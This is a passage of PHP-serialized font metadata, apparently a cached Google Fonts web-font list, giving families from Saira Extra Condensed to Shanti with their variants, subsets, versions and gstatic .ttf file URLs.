atic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrN2zR3ABgum-uoQ.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrU23R3ABgum-uoQ.ttf\";s:3:\"800\";s:105:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTrT27R3ABgum-uoQ.ttf\";s:3:\"900\";s:105:\"http://fonts.gstatic.com/s/sairaextracondensed/v11/-nFvOHYr-vcC7h8MklGBkrvmUG9rbpkisrTra2_R3ABgum-uoQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1212;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Saira Semi Condensed\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:101:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MN6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXdvaOM8rXT-8V8.ttf\";s:3:\"200\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXfDScMWg3j36Ebz.ttf\";s:3:\"300\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXenSsMWg3j36Ebz.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MD6c-2-nnJkHxyCjRcnMHcWVWV1cWRRU8LYuceqGT-.ttf\";s:3:\"500\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXf_S8MWg3j36Ebz.ttf\";s:3:\"600\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXfTTMMWg3j36Ebz.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXe3TcMWg3j36Ebz.ttf\";s:3:\"800\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXerTsMWg3j36Ebz.ttf\";s:3:\"900\";s:102:\"http://fonts.gstatic.com/s/sairasemicondensed/v11/U9MM6c-2-nnJkHxyCjRcnMHcWVWV1cWRRXePT8MWg3j36Ebz.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1213;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Saira Stencil One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/sairastencilone/v14/SLXSc03I6HkvZGJ1GvvipLoYSTEL9AsMawif2YQ2.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1214;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Salsa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/salsa/v17/gNMKW3FiRpKj-imY8ncKEZez.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1215;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Sanchez\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/sanchez/v13/Ycm2sZJORluHnXbITm5b_BwE1l0.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/sanchez/v13/Ycm0sZJORluHnXbIfmxR-D4Bxl3gkw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1216;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Sancreek\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/sancreek/v23/pxiHypAnsdxUm159X7D-XV9NEe-K.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1217;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Sansita\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"800\";i:5;s:9:\"800italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/sansita/v10/QldONTRRphEb_-V7HBm7TXFf3qw.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/sansita/v10/QldMNTRRphEb_-V7LBuxSVNazqx2xg.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/sansita/v10/QldLNTRRphEb_-V7JKWUaXl0wqVv3_g.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/sansita/v10/QldJNTRRphEb_-V7LBuJ9Xx-xodqz_joDQ.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/sansita/v10/QldLNTRRphEb_-V7JLmXaXl0wqVv3_g.ttf\";s:9:\"800italic\";s:77:\"http://fonts.gstatic.com/s/sansita/v10/QldJNTRRphEb_-V7LBuJ6X9-xodqz_joDQ.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/sansita/v10/QldLNTRRphEb_-V7JJ2WaXl0wqVv3_g.ttf\";s:9:\"900italic\";s:77:\"http://fonts.gstatic.com/s/sansita/v10/QldJNTRRphEb_-V7LBuJzX5-xodqz_joDQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1218;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Sansita Swashed\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"300\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW-ppbToVehmEa4Q.ttf\";s:7:\"regular\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW7RpbToVehmEa4Q.ttf\";s:3:\"500\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW4ZpbToVehmEa4Q.ttf\";s:3:\"600\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW2pubToVehmEa4Q.ttf\";s:3:\"700\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSW1NubToVehmEa4Q.ttf\";s:3:\"800\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSWzRubToVehmEa4Q.ttf\";s:3:\"900\";s:105:\"http://fonts.gstatic.com/s/sansitaswashed/v17/BXR8vFfZifTZgFlDDLgNkBydPKTt3pVCeYWqJnZSWx1ubToVehmEa4Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1219;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Sarabun\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"100\";s:73:\"http://fonts.gstatic.com/s/sarabun/v13/DtVhJx26TKEr37c9YHZJmnYI5gnOpg.ttf\";s:9:\"100italic\";s:75:\"http://fonts.gstatic.com/s/sarabun/v13/DtVnJx26TKEr37c9aBBx_nwMxAzephhN.ttf\";s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YNpoulwm6gDXvwE.ttf\";s:9:\"200italic\";s:77:\"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxUl0s7iLSrwFUlw.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YL5rulwm6gDXvwE.ttf\";s:9:\"300italic\";s:77:\"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxNl4s7iLSrwFUlw.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/sarabun/v13/DtVjJx26TKEr37c9WBJDnlQN9gk.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/sarabun/v13/DtVhJx26TKEr37c9aBBJmnYI5gnOpg.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YOZqulwm6gDXvwE.ttf\";s:9:\"500italic\";s:77:\"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxbl8s7iLSrwFUlw.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YMptulwm6gDXvwE.ttf\";s:9:\"600italic\";s:77:\"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxQlgs7iLSrwFUlw.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YK5sulwm6gDXvwE.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxJlks7iLSrwFUlw.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/sarabun/v13/DtVmJx26TKEr37c9YLJvulwm6gDXvwE.ttf\";s:9:\"800italic\";s:77:\"http://fonts.gstatic.com/s/sarabun/v13/DtVkJx26TKEr37c9aBBxOlos7iLSrwFUlw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1220;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Sarala\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/sarala/v10/uK_y4riEZv4o1w9RCh0TMv6EXw.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/sarala/v10/uK_x4riEZv4o1w9ptjI3OtWYVkMpXA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1221;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Sarina\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/sarina/v21/-F6wfjF3ITQwasLhLkDUriBQxw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1222;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Sarpanch\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/sarpanch/v11/hESy6Xt4NCpRuk6Pzh2ARIrX_20n.ttf\";s:3:\"500\";s:76:\"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziV0ba7f1HEuRHkM.ttf\";s:3:\"600\";s:76:\"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziVYaq7f1HEuRHkM.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziU8a67f1HEuRHkM.ttf\";s:3:\"800\";s:76:\"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziUgaK7f1HEuRHkM.ttf\";s:3:\"900\";s:76:\"http://fonts.gstatic.com/s/sarpanch/v11/hES16Xt4NCpRuk6PziUEaa7f1HEuRHkM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1223;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Sassy Frass\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/sassyfrass/v5/LhWhMVrGOe0FLb97BjhsE99dGNWQg_am.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1224;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Satisfy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/satisfy/v17/rP2Hp2yn6lkG50LoOZSCHBeHFl0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1225;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Sawarabi Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/sawarabigothic/v12/x3d4ckfVaqqa-BEj-I9mE65u3k3NBSk3E2YljQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1226;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Sawarabi Mincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/sawarabimincho/v17/8QIRdiDaitzr7brc8ahpxt6GcIJTLahP46UDUw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1227;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Scada\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/scada/v14/RLpxK5Pv5qumeWJoxzUobkvv.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/scada/v14/RLp_K5Pv5qumeVJqzTEKa1vvffg.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/scada/v14/RLp8K5Pv5qumeVrU6BEgRVfmZOE5.ttf\";s:9:\"700italic\";s:72:\"http://fonts.gstatic.com/s/scada/v14/RLp6K5Pv5qumeVJq9Y0lT1PEYfE5p6g.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1228;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Scheherazade New\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-24\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/scheherazadenew/v12/4UaZrFhTvxVnHDvUkUiHg8jprP4DCwNsOl4p5Is.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/scheherazadenew/v12/4UaerFhTvxVnHDvUkUiHg8jprP4DM79DHlYC-IKnoSE.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1229;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Schoolbell\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-11\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/schoolbell/v18/92zQtBZWOrcgoe-fgnJIVxIQ6mRqfiQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1230;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Scope One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/scopeone/v14/WBLnrEXKYFlGHrOKmGD1W0_MJMGxiQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1231;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Seaweed Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/seaweedscript/v13/bx6cNx6Tne2pxOATYE8C_Rsoe0WJ-KcGVbLW.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1232;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Secular One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/secularone/v11/8QINdiTajsj_87rMuMdKypDlMul7LJpK.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1233;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Sedgwick Ave\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/sedgwickave/v12/uK_04rKEYuguzAcSYRdWTJq8Xmg1Vcf5JA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1234;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Sedgwick Ave Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/sedgwickavedisplay/v19/xfuu0XPgU3jZPUoUo3ScvmPi-NapQ8OxM2czd-YnOzUD.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1235;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Sen\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:60:\"http://fonts.gstatic.com/s/sen/v7/6xKjdSxYI9_Hm_-MImrpLQ.ttf\";s:3:\"700\";s:64:\"http://fonts.gstatic.com/s/sen/v7/6xKudSxYI9__J9CoKkH1JHUQSQ.ttf\";s:3:\"800\";s:64:\"http://fonts.gstatic.com/s/sen/v7/6xKudSxYI9__O9OoKkH1JHUQSQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1236;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Send Flowers\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/sendflowers/v2/If2PXTjtZS-0Xqy13uCQSULvxwjjouU1iw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1237;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Sevillana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/sevillana/v21/KFOlCnWFscmDt1Bfiy1vAx05IsDqlA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1238;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Seymour One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/seymourone/v20/4iCp6Khla9xbjQpoWGGd0myIPYBvgpUI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1239;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Shadows Into Light\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/shadowsintolight/v15/UqyNK9UOIntux_czAvDQx_ZcHqZXBNQDcsr4xzSMYA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1240;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Shadows Into Light Two\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/shadowsintolighttwo/v13/4iC86LVlZsRSjQhpWGedwyOoW-0A6_kpsyNmlAvNGLNnIF0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1241;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Shalimar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/shalimar/v5/uU9MCBoE6I6iNWFUvTPx8PCOg0uX.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1242;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Shanti\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/shanti/v23/t5